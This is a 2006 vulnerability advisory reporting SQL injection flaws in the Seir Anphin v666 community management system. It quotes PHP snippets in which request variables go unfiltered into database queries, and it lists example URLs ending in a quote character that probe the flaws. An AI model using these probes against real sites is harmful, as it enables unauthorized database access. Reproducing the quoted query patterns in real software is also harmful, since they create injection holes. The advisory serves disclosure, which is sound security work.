CR Advisory#1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ programm: Seir Anphin v666 Community Management System bug: SQL injection home page: www.comeplaydying.com bug found: 27.07.2006 discovered by CR www.svt.nukleon.us ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~! Details !~ ============================================================================================ index.php ^^^^^^^^^ [code] .... if (isset($HTTP_GET_VARS['styleid'])) { $styleid = $HTTP_GET_VARS['styleid']; $dbr->query("UPDATE {$dbr->p}user_options SET skin=$styleid WHERE userid=$userinfo[userid]"); ..... [/code] Variable $userinfo is not filtered on presence dangerous symbol, thank that, possible produce SQL injection [code] ..... function loadskin($skinid) { GLOBAL $dbr,$data; $dbr->query("SELECT * FROM {$dbr->p}skins WHERE skinid=$skinid"); ..... [/code] Variable $skinid is not filtered on presence dangerous symbol, thank that, possible produce SQL injection ============================================================================================ article.php ^^^^^^^^^^^ [code] .... if ($this->id != 0) { $a['breadcrumbs'] = ''; $catid = $this->id; $c = 1; while ($c <= getsetting('max_crumb_depth')) { if ($catid == 0) break; $dbr->query("SELECT parentid,name,accesslvl_to_read,accesslvl_to_contribute,archive_mode FROM {$dbr->p}article_categories WHERE catid=$catid"); $cat = $dbr->getarray(); $crumb_array[] = array('id'=>$catid, 'name'=>stripslashes($cat['name']), 'accesslvl_to_read'=>$cat['accesslvl_to_read'], 'accesslvl_to_contribute'=>$cat['accesslvl_to_contribute']); $catid = $cat['parentid']; $c++; } .... [/code] Variable $catid is not filtered on presence dangerous symbol, thank that, possible produce SQL injection [code] .... foreach ($HTTP_POST_VARS['orders'] as $pageid=>$displayorder) { // Ensure, at this level, that user has admin, editor or author permission to do this. $pass = FALSE; if (isadmin() || iseditor()) $pass = TRUE; $articleid = $dbr->result("SELECT articleid FROM {$dbr->p}article_pages WHERE pageid=$pageid"); $authorid = $dbr->result("SELECT userid FROM {$dbr->p}articles WHERE articleid=$articleid"); if ($data->vars['user']['userid'] == $authorid) $pass = TRUE; if ($pass) $dbr->query("UPDATE {$dbr->p}article_pages SET displayorder=$displayorder WHERE pageid=$pageid"); } .... [/code] Variable $pageid, $articleid are not filtered on presence dangerous symbol, thank that, possible produce SQL injection ============================================================================================ blag.php ^^^^^^^^^^^ [code] ..... if ($this->id != 0) { $userid = $dbr->result("SELECT userid FROM {$dbr->p}user_blogs WHERE blogid=$blogid"); if (!isadmin() && $data->vars['user']['userid'] == $userid) { setstatus('access_denied'); $this->id = $blogid; return $this->show(); } } .... [/code] Variable $blogid is not filtered on presence dangerous symbol, thank that, possible produce SQL injection [code] .... $dbr->query("SELECT p.blogid, b.locked, b.allow_comments, b.isprivate, b.userid FROM {$dbr->p}user_blog_posts p LEFT JOIN {$dbr->p}user_blogs b ON b.blogid=p.blogid WHERE p.postid=$postid"); .... [/code] Variable $postid is not filtered on presence dangerous symbol, thank that, possible produce SQL injection ============================================================================================ example ^^^^^^^^^^^ http://www.example.com/index.php?m=' http://www.example.com/index.php?m=member&id=' http://www.example.com/index.php?m=article&id=' http://www.example.com/index.php?m=article&op=read&id=' http://www.example.com/index.php?m=blog&id=' http://www.example.com/index.php?m=blog&op=getpost&id=' ============================================================================================ CR [ www.svt.nukleon.us ] 2006 ã.